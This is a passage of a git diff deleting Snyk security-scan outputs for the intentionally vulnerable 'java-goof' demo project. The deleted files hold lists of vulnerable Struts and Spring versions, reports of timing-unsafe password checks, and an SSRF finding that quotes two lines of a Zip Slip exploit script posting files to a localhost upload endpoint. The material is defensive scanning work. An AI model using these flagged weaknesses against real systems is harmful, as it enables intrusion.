"org.apache.struts:struts2-core@2.3.20", - "org.freemarker:freemarker@2.3.19", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "commons-fileupload:commons-fileupload@1.3.1", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "commons-fileupload:commons-fileupload@1.3.1", - "commons-fileupload:commons-fileupload@1.3.1", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "ognl:ognl@3.0.6", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "vulns": [ - "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", - "SNYK-JAVA-COMMONSIO-1277109", - "SNYK-JAVA-ORGAPACHESTRUTS-6102825", - "SNYK-JAVA-ORGAPACHESTRUTS-6100744", - "SNYK-JAVA-ORGAPACHESTRUTS-5707101", - "SNYK-JAVA-ORGAPACHESTRUTS-2635340", - "SNYK-JAVA-ORGAPACHESTRUTS-1049003", - "SNYK-JAVA-ORGFREEMARKER-1076795", - "SNYK-JAVA-ORGAPACHESTRUTS-608097", - 
"SNYK-JAVA-ORGAPACHESTRUTS-608098", - "SNYK-JAVA-ORGAPACHESTRUTS-609765", - "SNYK-JAVA-COMMONSFILEUPLOAD-30401", - "SNYK-JAVA-ORGAPACHESTRUTS-32477", - "SNYK-JAVA-ORGAPACHESTRUTS-31495", - "SNYK-JAVA-ORGAPACHESTRUTS-31501", - "SNYK-JAVA-ORGAPACHESTRUTS-31502", - "SNYK-JAVA-ORGAPACHESTRUTS-31503", - "SNYK-JAVA-ORGAPACHESTRUTS-31500", - "SNYK-JAVA-ORGAPACHESTRUTS-30207", - "SNYK-JAVA-ORGAPACHESTRUTS-30778", - "SNYK-JAVA-COMMONSFILEUPLOAD-30082", - "SNYK-JAVA-COMMONSFILEUPLOAD-31540", - "SNYK-JAVA-ORGAPACHESTRUTS-30774", - "SNYK-JAVA-ORGAPACHESTRUTS-30775", - "SNYK-JAVA-ORGAPACHESTRUTS-30776", - "SNYK-JAVA-ORGAPACHESTRUTS-451610", - "SNYK-JAVA-ORGAPACHESTRUTS-460223", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", - "SNYK-JAVA-OGNL-30474", - "SNYK-JAVA-ORGAPACHESTRUTS-30773", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", - "SNYK-JAVA-ORGAPACHESTRUTS-30060", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", - "SNYK-JAVA-ORGAPACHESTRUTS-30770", - "SNYK-JAVA-ORGAPACHESTRUTS-30771", - "SNYK-JAVA-ORGAPACHESTRUTS-30772", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418" - ] - }, - "org.springframework:spring-web@3.2.6.RELEASE": { - "upgradeTo": "org.springframework:spring-web@5.3.34", - "upgrades": [ - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE", - 
"org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "vulns": [ - "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331" - ] - }, - "org.zeroturnaround:zt-zip@1.12": { - "upgradeTo": "org.zeroturnaround:zt-zip@1.13", - "upgrades": [ - "org.zeroturnaround:zt-zip@1.12" - ], - "vulns": [ - "SNYK-JAVA-ORGZEROTURNAROUND-31681" - ] - } - }, - "patch": {}, - "ignore": {}, - "pin": {} - }, - "filesystemPolicy": false, - "filtered": { - "ignore": [], - "patch": [] - }, - "uniqueCount": 157, - "projectName": "io.github.snyk:todolist-web-struts", - "foundProjectCount": 7, - "displayTargetFile": "todolist-goof/todolist-web-struts/pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - } -] diff --git a/output.txt b/output.txt deleted file mode 100644 index 41bda4bec4..0000000000 --- a/output.txt +++ /dev/null 
@@ -1,15 +0,0 @@
-
-Testing /Users/austindoll/Documents/GitHub/java-goof ...
-
-
-✔ Test completed
-
-Organization: austin.doll
-Test type: Static code analysis
-Project path: /Users/austindoll/Documents/GitHub/java-goof
-
-Summary:
-
-✔ Awesome! No issues were found.
-
-
diff --git a/output2.json b/output2.json
deleted file mode 100644
index f64d7e0220..0000000000
--- a/output2.json
+++ /dev/null
@@ -1,12 +0,0 @@
-[
- "CWE-918"
-]
-[
- "CWE-256"
-]
-[
- "CWE-918"
-]
-[
- "CWE-256"
-]
diff --git a/snyk.html b/snyk.html
deleted file mode 100644
index c82edb3770..0000000000
--- a/snyk.html
+++ /dev/null
@@ -1,828 +0,0 @@ - - - - - - - - - Snyk test report - - - - - - - - - -
-
-
- - - Snyk - Snyk Code - - - - - - - - - - - - - - - -
-

February 26th 2024, 2:54:11 pm (UTC+00:00)

-
Source: /Users/austindoll/Documents/GitHub/java-goof
-
-
-
- -
-
-
-

Snyk Code Report

- -
-
- 0 high issues -
-
- 3 medium issues -
-
- 0 low issues -
-
-
-
- Scan Coverage -
    -
  • HTML files: 10
  • Python files: 2
  • JavaScript files: 6
  • Java Server Pages files: 12
  • Java files: 36
  • XML files: 14
  • -
-
-
-
-
-
-
-
-

Unprotected Storage of Credentials

-
- Data Flow - Fix Analysis -
-
-
    -
  • SNYK-CODE
  • -
  • CWE-256
  • -
-
-
-
-

An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.

-
Found in: todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java (line : 250)
-
-
-

Data Flow

-
todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java
-
- 250:17 -
return !
changePasswordForm.getNewPassword().equals(changePasswordForm.getConfirmationPassword());
- SourceSink - 0 -
-
-
-

Fix Analysis

-

Details

-

If credentials are not protected or not sufficiently protected through strong encryption, attackers can access this information in a number of ways. Developers may rely on plain-text storage of credentials when they believe the system is completely secure from attack or only accessible to insiders. This confidence is misguided and dangerous. If a malicious insider-such as a former employee-or a hostile attacker using SQL injection, XML injection, or a brute-force attack accesses the system, they can access this credential information to gain unauthorized permissions within the system and to export other confidential and secure information.

-

Best practices for prevention

-
    -
  • Ensure that passwords are never stored in plain text, even for "purely internal" use.
  • -
  • Never rely on password encoding, such as base 64 encoding; choose a complex encryption algorithm that includes salting, then hashing.
  • -
  • Implement zero-trust approaches in which users have access only to information needed for legitimate business purposes.
  • -
  • To the greatest extent possible, secure the application against injection attacks and other types of weaknesses.
  • -
-
-
-
-
-
-
-
-
-

Unprotected Storage of Credentials

-
- Data Flow - Fix Analysis -
-
-
    -
  • SNYK-CODE
  • -
  • CWE-256
  • -
-
-
-
-

An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.

-
Found in: todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java (line : 254)
-
-
-

Data Flow

- -
- 254:17 -
return !
changePasswordForm.getCurrentPassword().equals(user.getPassword());
- SourceSink - 0 -
-
-
-

Fix Analysis

-

Details

-

If credentials are not protected or not sufficiently protected through strong encryption, attackers can access this information in a number of ways. Developers may rely on plain-text storage of credentials when they believe the system is completely secure from attack or only accessible to insiders. This confidence is misguided and dangerous. If a malicious insider-such as a former employee-or a hostile attacker using SQL injection, XML injection, or a brute-force attack accesses the system, they can access this credential information to gain unauthorized permissions within the system and to export other confidential and secure information.

-

Best practices for prevention

-
    -
  • Ensure that passwords are never stored in plain text, even for "purely internal" use.
  • -
  • Never rely on password encoding, such as base 64 encoding; choose a complex encryption algorithm that includes salting, then hashing.
  • -
  • Implement zero-trust approaches in which users have access only to information needed for legitimate business purposes.
  • -
  • To the greatest extent possible, secure the application against injection attacks and other types of weaknesses.
  • -
-
-
-
-
-
-
-
-
-

Server-Side Request Forgery (SSRF)

-
- Data Flow - Fix Analysis -
-
-
    -
  • SNYK-CODE
  • -
  • CWE-918
  • -
-
-
-
-

Unsanitized input from a command line argument flows into requests.post, where it is used as an URL to perform a request. This may result in a Server Side Request Forgery vulnerability.

-
Found in: todolist-goof/exploits/zip-slip.py (line : 13)
-
-
-

Data Flow

-
todolist-goof/exploits/zip-slip.py
-
- 10:8 -
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
- Source - 0 -
- -
- 10:8 -
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
- - 1 -
- -
- 10:8 -
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
- - 2 -
- -
- 10:8 -
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
- - 3 -
- -
- 10:7 -
url =
(sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
- - 4 -
- -
- 10:1 -

url = (sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
- - 5 -
- -
- 13:15 -
requests.post(
url, files=files)
- - 6 -
- -
- 13:1 -

requests.post(url, files=files)
- Sink - 7 -
-
-
-

Fix Analysis

-

Details

-

In a server-side request forgery attack, a malicious user supplies a URL (an external URL or a network IP address such as 127.0.0.1) to the application's back end. The server then accesses the URL and shares its results, which may include sensitive information such as AWS metadata, internal configuration information, or database contents with the attacker. Because the request comes from the back end, it bypasses access controls, potentially exposing information the user does not have sufficient privileges to receive. The attacker can then exploit this information to gain access, modify the web application, or demand a ransom payment.

-

Best practices for prevention

-
    -
  • Blacklists are problematic and attackers have numerous ways to bypass them; ideally, use a whitelist of all permitted domains and IP addresses.
  • -
  • Use authentication even within your own network to prevent exploitation of server-side requests.
  • -
  • Implement zero trust and sanitize and validate all URL and header data returning to the server from the user. Strip invalid or suspect characters, then inspect to be certain it contains a valid and expected value.
  • -
  • Ideally, avoid sending server requests based on user-provided data altogether.
  • -
  • Ensure that you are not sending raw response bodies from the server directly to the client. Only deliver expected responses.
  • -
  • Disable suspect and exploitable URL schemas. Common culprits include obscure and little-used schemas such as file://, dict://, ftp://, and gopher://.
  • -
-
-
-
-
-
-
-
- - - 
\ No newline at end of file
diff --git a/test-command.json b/test-command.json
deleted file mode 100644
index 6d4c11ff6e..0000000000
--- a/test-command.json
+++ /dev/null
@@ -1,1421 +0,0 @@ -{ - "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", - "version": "2.1.0", - "runs": [ - { - "tool": { - "driver": { - "name": "SnykCode", - "semanticVersion": "1.0.0", - "version": "1.0.0", - "rules": [ - { - "id": "python/Ssrf", - "name": "Ssrf", - "shortDescription": { - "text": "Server-Side Request Forgery (SSRF)" - }, - "defaultConfiguration": { - "level": "warning" - }, - "help": { - "markdown": "\n## Details\nIn a server-side request forgery attack, a malicious user supplies a URL (an external URL or a network IP address such as 127.0.0.1) to the application's back end. The server then accesses the URL and shares its results, which may include sensitive information such as AWS metadata, internal configuration information, or database contents with the attacker. Because the request comes from the back end, it bypasses access controls, potentially exposing information the user does not have sufficient privileges to receive. The attacker can then exploit this information to gain access, modify the web application, or demand a ransom payment.\n\n## Best practices for prevention\n* Blacklists are problematic and attackers have numerous ways to bypass them; ideally, use a whitelist of all permitted domains and IP addresses.\n* Use authentication even within your own network to prevent exploitation of server-side requests.\n* Implement zero trust and sanitize and validate all URL and header data returning to the server from the user. Strip invalid or suspect characters, then inspect to be certain it contains a valid and expected value.\n* Ideally, avoid sending server requests based on user-provided data altogether.\n* Ensure that you are not sending raw response bodies from the server directly to the client. Only deliver expected responses.\n* Disable suspect and exploitable URL schemas. 
Common culprits include obscure and little-used schemas such as `file://`, `dict://`, `ftp://`, and `gopher://`.", - "text": "" - }, - "properties": { - "tags": [ - "python", - "Ssrf", - "Security", - "SourceNonServer", - "SourceLocalEnv", - "SourceCLI", - "Taint" - ], - "categories": [ - "Security" - ], - "exampleCommitFixes": [ - { - "commitURL": "https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/commit/23ad832af741f0354949a72e6c6f799eb9d2bace?diff=split#diff-7efee2ee97af01f846ed5818e84c955c51bd8efe06588e0dfa341c68966d945fL-1", - "lines": [ - { - "line": " parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=\"Downloads and unpacks assets\")\n", - "lineNumber": 31, - "lineChange": "removed" - }, - { - "line": " parser.add_argument(\"zip_url\", action=\"store\", type=str, help=\"URL of the assets package\")\n", - "lineNumber": 32, - "lineChange": "removed" - }, - { - "line": " args = parser.parse_args()\n", - "lineNumber": 33, - "lineChange": "removed" - }, - { - "line": " url = \"https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/releases/download/v1.1.2/scenes.zip\"\n", - "lineNumber": 31, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 34, - "lineChange": "none" - }, - { - "line": " try:\n", - "lineNumber": 35, - "lineChange": "none" - }, - { - "line": " request = requests.get(args.zip_url, stream=True)\n", - "lineNumber": 36, - "lineChange": "removed" - }, - { - "line": " request = requests.get(url, stream=True)\n", - "lineNumber": 34, - "lineChange": "added" - } - ] - }, - { - "commitURL": "https://github.com/yask123/Instant-Movie-Streamer/commit/0b66df24286da3df144b8874cb40db4c6ddf5c6c?diff=split#diff-92c6c2b7103c0f894cf5a1c09b289b8251c1c260eb20cb9027189a2a0eee5d99L-1", - "lines": [ - { - "line": "def get_magnet_link(movie_name = 'harry potter'):\n", - "lineNumber": 32, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 33, - 
"lineChange": "added" - }, - { - "line": " URL = 'https://www.skytorrents.in/search/all/ed/1/?q='+movie_name.replace(' ', '+')\n", - "lineNumber": 34, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 39, - "lineChange": "none" - }, - { - "line": "def get_torrent_url(search_url):\n", - "lineNumber": 40, - "lineChange": "removed" - }, - { - "line": " \"\"\"Grabs the best matched torrent URL from the search results.\"\"\"\n", - "lineNumber": 41, - "lineChange": "removed" - }, - { - "line": " search_request_response = requests.get(search_url, verify=False)\n", - "lineNumber": 42, - "lineChange": "removed" - }, - { - "line": " soup = BeautifulSoup(search_request_response.text, 'html.parser')\n", - "lineNumber": 43, - "lineChange": "removed" - }, - { - "line": " movie_page = 'https://kat.cr' + (soup.find_all(\"a\", class_=\"cellMainLink\")[0].get('href'))\n", - "lineNumber": 44, - "lineChange": "removed" - }, - { - "line": " resp = requests.get(URL)\n", - "lineNumber": 36, - "lineChange": "added" - }, - { - "line": " soup = BeautifulSoup(resp.text, 'html.parser')\n", - "lineNumber": 37, - "lineChange": "added" - } - ] - }, - { - "commitURL": "https://github.com/hacktoolkit/django-htk/commit/01df728743a36721d7659247a3e3b9907133ffee?diff=split#diff-eec36e337287f60f4a26ec5ed80b77d0234217d0de7dab8846fe3a39048cef9fL-1", - "lines": [ - { - "line": "GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", - "lineNumber": 23, - "lineChange": "removed" - }, - { - "line": "GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", - "lineNumber": 24, - "lineChange": "removed" - }, - { - "line": "GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", - "lineNumber": 25, - "lineChange": "removed" - }, - { - "line": "from htk.utils import htk_setting\n", - "lineNumber": 23, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 24, - 
"lineChange": "added" - }, - { - "line": "GOOGLE_GEOCODING_API_URL = 'https://maps.googleapis.com/maps/api/geocode/json'\n", - "lineNumber": 25, - "lineChange": "added" - }, - { - "line": "#GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", - "lineNumber": 26, - "lineChange": "added" - }, - { - "line": "#GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", - "lineNumber": 27, - "lineChange": "added" - }, - { - "line": "#GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", - "lineNumber": 28, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 29, - "lineChange": "none" - }, - { - "line": "class Usage(Exception):\n", - "lineNumber": 30, - "lineChange": "none" - }, - { - "line": " def __init__(self, msg):\n", - "lineNumber": 31, - "lineChange": "none" - }, - { - "line": " self.msg = msg\n", - "lineNumber": 32, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 33, - "lineChange": "none" - }, - { - "line": "def main(argv = None):\n", - "lineNumber": 34, - "lineChange": "none" - }, - { - "line": " OPT_STR = 'hgr'\n", - "lineNumber": 35, - "lineChange": "none" - }, - { - "line": " OPT_LIST = [\n", - "lineNumber": 36, - "lineChange": "none" - }, - { - "line": " 'help',\n", - "lineNumber": 37, - "lineChange": "none" - }, - { - "line": " 'geocode',\n", - "lineNumber": 38, - "lineChange": "none" - }, - { - "line": " 'resolve',\n", - "lineNumber": 39, - "lineChange": "none" - }, - { - "line": " ]\n", - "lineNumber": 40, - "lineChange": "none" - }, - { - "line": " is_geocode = True\n", - "lineNumber": 41, - "lineChange": "none" - }, - { - "line": " if argv is None:\n", - "lineNumber": 42, - "lineChange": "none" - }, - { - "line": " argv = sys.argv\n", - "lineNumber": 43, - "lineChange": "none" - }, - { - "line": " try:\n", - "lineNumber": 44, - "lineChange": "none" - }, - { - "line": " try:\n", - "lineNumber": 
45, - "lineChange": "none" - }, - { - "line": " progname = argv[0]\n", - "lineNumber": 46, - "lineChange": "none" - }, - { - "line": " opts, args = getopt.getopt(argv[1:],\n", - "lineNumber": 47, - "lineChange": "none" - }, - { - "line": " OPT_STR,\n", - "lineNumber": 48, - "lineChange": "none" - }, - { - "line": " OPT_LIST)\n", - "lineNumber": 49, - "lineChange": "none" - }, - { - "line": " except getopt.error, msg:\n", - "lineNumber": 50, - "lineChange": "none" - }, - { - "line": " raise Usage(msg)\n", - "lineNumber": 51, - "lineChange": "none" - }, - { - "line": " # process options\n", - "lineNumber": 52, - "lineChange": "none" - }, - { - "line": " for o, a in opts:\n", - "lineNumber": 53, - "lineChange": "none" - }, - { - "line": " if o in ('-h', '--help'):\n", - "lineNumber": 54, - "lineChange": "none" - }, - { - "line": " print __doc__\n", - "lineNumber": 55, - "lineChange": "none" - }, - { - "line": " sys.exit(0)\n", - "lineNumber": 56, - "lineChange": "none" - }, - { - "line": " elif o in ('-g', '--geocode'):\n", - "lineNumber": 57, - "lineChange": "none" - }, - { - "line": " is_geocode = True\n", - "lineNumber": 58, - "lineChange": "none" - }, - { - "line": " elif o in ('-r', '--resolve'):\n", - "lineNumber": 59, - "lineChange": "none" - }, - { - "line": " is_geocode = False\n", - "lineNumber": 60, - "lineChange": "none" - }, - { - "line": " if is_geocode and len(args) == 1:\n", - "lineNumber": 61, - "lineChange": "none" - }, - { - "line": " address = args[0]\n", - "lineNumber": 62, - "lineChange": "none" - }, - { - "line": " latitude, longitude = get_latlng(address)\n", - "lineNumber": 63, - "lineChange": "none" - }, - { - "line": " print '%s,%s' % (latitude, longitude,)\n", - "lineNumber": 64, - "lineChange": "none" - }, - { - "line": " elif not is_geocode and len(args) == 2:\n", - "lineNumber": 65, - "lineChange": "none" - }, - { - "line": " latitude = args[0]\n", - "lineNumber": 66, - "lineChange": "none" - }, - { - "line": " longitude = args[1]\n", - 
"lineNumber": 67, - "lineChange": "none" - }, - { - "line": " address = reverse_geocode(latitude, longitude)\n", - "lineNumber": 68, - "lineChange": "none" - }, - { - "line": " print address\n", - "lineNumber": 69, - "lineChange": "none" - }, - { - "line": " else:\n", - "lineNumber": 70, - "lineChange": "none" - }, - { - "line": " raise Usage('Incorrect arguments')\n", - "lineNumber": 71, - "lineChange": "none" - }, - { - "line": " \n", - "lineNumber": 72, - "lineChange": "none" - }, - { - "line": " except Usage, err:\n", - "lineNumber": 73, - "lineChange": "none" - }, - { - "line": " print >> sys.stderr, err.msg\n", - "lineNumber": 74, - "lineChange": "none" - }, - { - "line": " print >> sys.stderr, \"for help use --help\"\n", - "lineNumber": 75, - "lineChange": "none" - }, - { - "line": " return 3.14159\n", - "lineNumber": 76, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 77, - "lineChange": "none" - }, - { - "line": "def get_latlng(address):\n", - "lineNumber": 78, - "lineChange": "none" - }, - { - "line": " address_query = urllib.quote(address, '')\n", - "lineNumber": 76, - "lineChange": "none" - }, - { - "line": " \n", - "lineNumber": 77, - "lineChange": "none" - }, - { - "line": " values = {\n", - "lineNumber": 78, - "lineChange": "none" - }, - { - "line": " 'format' : 'json',\n", - "lineNumber": 79, - "lineChange": "none" - }, - { - "line": "'sensor' : 'false',\n", - "lineNumber": 80, - "lineChange": "none" - }, - { - "line": "'address' : address_query,\n", - "lineNumber": 81, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 82, - "lineChange": "none" - }, - { - "line": " url = GOOGLE_GEOCODING_API_GEOCODE_URL % values\n", - "lineNumber": 83, - "lineChange": "removed" - }, - { - "line": " response = requests.get(url)\n", - "lineNumber": 84, - "lineChange": "removed" - }, - { - "line": " key = htk_setting('HTK_GOOGLE_GEOCODING_API_KEY', None)\n", - "lineNumber": 83, - "lineChange": "added" - }, - { - "line": " if key:\n", - 
"lineNumber": 84, - "lineChange": "added" - }, - { - "line": " params['key'] = key\n", - "lineNumber": 85, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 86, - "lineChange": "added" - }, - { - "line": " response = requests.get(GOOGLE_GEOCODING_API_URL, params=params)\n", - "lineNumber": 87, - "lineChange": "added" - } - ] - } - ], - "exampleCommitDescriptions": [], - "precision": "very-high", - "repoDatasetSize": 4, - "cwe": [ - "CWE-918" - ] - } - }, - { - "id": "java/ReturnsPassword", - "name": "ReturnsPassword", - "shortDescription": { - "text": "Unprotected Storage of Credentials" - }, - "defaultConfiguration": { - "level": "warning" - }, - "help": { - "markdown": "## Details\n\nIf credentials are not protected or not sufficiently protected through strong encryption, attackers can access this information in a number of ways. Developers may rely on plain-text storage of credentials when they believe the system is completely secure from attack or only accessible to insiders. This confidence is misguided and dangerous. 
If a malicious insider-such as a former employee-or a hostile attacker using SQL injection, XML injection, or a brute-force attack accesses the system, they can access this credential information to gain unauthorized permissions within the system and to export other confidential and secure information.\n\n## Best practices for prevention\n* Ensure that passwords are never stored in plain text, even for \"purely internal\" use.\n* Never rely on password encoding, such as base 64 encoding; choose a complex encryption algorithm that includes salting, then hashing.\n* Implement zero-trust approaches in which users have access only to information needed for legitimate business purposes.\n* To the greatest extent possible, secure the application against injection attacks and other types of weaknesses.", - "text": "" - }, - "properties": { - "tags": [ - "java", - "ReturnsPassword", - "Security" - ], - "categories": [ - "Security" - ], - "exampleCommitFixes": [ - { - "commitURL": "https://github.com/ShotaOd/carbon/commit/4562a7a2c0f27065ed63c7615f044423ad1701fd?diff=split#diff-5a57acf4efafddf23331cc9f3c8d724e1cdd01633f61aa2d4e680b9b5241ff71L-1", - "lines": [ - { - "line": "import org.mindrot.jbcrypt.BCrypt;\n", - "lineNumber": 6, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 7, - "lineChange": "none" - }, - { - "line": "/**\n", - "lineNumber": 8, - "lineChange": "none" - }, - { - "line": " * @author Shota Oda 2016/11/23.\n", - "lineNumber": 9, - "lineChange": "none" - }, - { - "line": " */\n", - "lineNumber": 10, - "lineChange": "none" - }, - { - "line": "@Data\n", - "lineNumber": 11, - "lineChange": "none" - }, - { - "line": "@AllArgsConstructor\n", - "lineNumber": 12, - "lineChange": "none" - }, - { - "line": "public class BusinessAuthIdentity implements AuthIdentity{\n", - "lineNumber": 13, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 14, - "lineChange": "none" - }, - { - "line": "\tprivate Lecturer user;\n", - "lineNumber": 15, - 
"lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 16, - "lineChange": "none" - }, - { - "line": "\t@Override\n", - "lineNumber": 17, - "lineChange": "none" - }, - { - "line": "\tpublic String username() {\n", - "lineNumber": 18, - "lineChange": "none" - }, - { - "line": "\t\treturn user.getUsername();\n", - "lineNumber": 19, - "lineChange": "none" - }, - { - "line": "\t}\n", - "lineNumber": 20, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 21, - "lineChange": "none" - }, - { - "line": "\t@Override\n", - "lineNumber": 22, - "lineChange": "none" - }, - { - "line": "\tpublic String cryptPassword() {\n", - "lineNumber": 23, - "lineChange": "none" - }, - { - "line": "\t\treturn user.getPassword();\n", - "lineNumber": 24, - "lineChange": "none" - }, - { - "line": "\t}\n", - "lineNumber": 25, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 26, - "lineChange": "none" - }, - { - "line": "\t@Override\n", - "lineNumber": 27, - "lineChange": "none" - }, - { - "line": "\tpublic boolean confirm(String plainPassword) {\n", - "lineNumber": 28, - "lineChange": "none" - }, - { - "line": "\t\treturn cryptPassword().equals(plainPassword);\n", - "lineNumber": 28, - "lineChange": "removed" - }, - { - "line": " return BCrypt.checkpw(plainPassword, cryptPassword());\n", - "lineNumber": 29, - "lineChange": "added" - } - ] - }, - { - "commitURL": "https://github.com/ShotaOd/carbon/commit/4562a7a2c0f27065ed63c7615f044423ad1701fd?diff=split#diff-52010d754aef2fbde5a21bb6e6002096c329060b69306e842cd24a31129752b1L-1", - "lines": [ - { - "line": "import org.mindrot.jbcrypt.BCrypt;\n", - "lineNumber": 6, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 7, - "lineChange": "none" - }, - { - "line": "/**\n", - "lineNumber": 8, - "lineChange": "none" - }, - { - "line": " * @author Shota Oda 2016/11/23.\n", - "lineNumber": 9, - "lineChange": "none" - }, - { - "line": " */\n", - "lineNumber": 10, - "lineChange": "none" - }, - { - "line": 
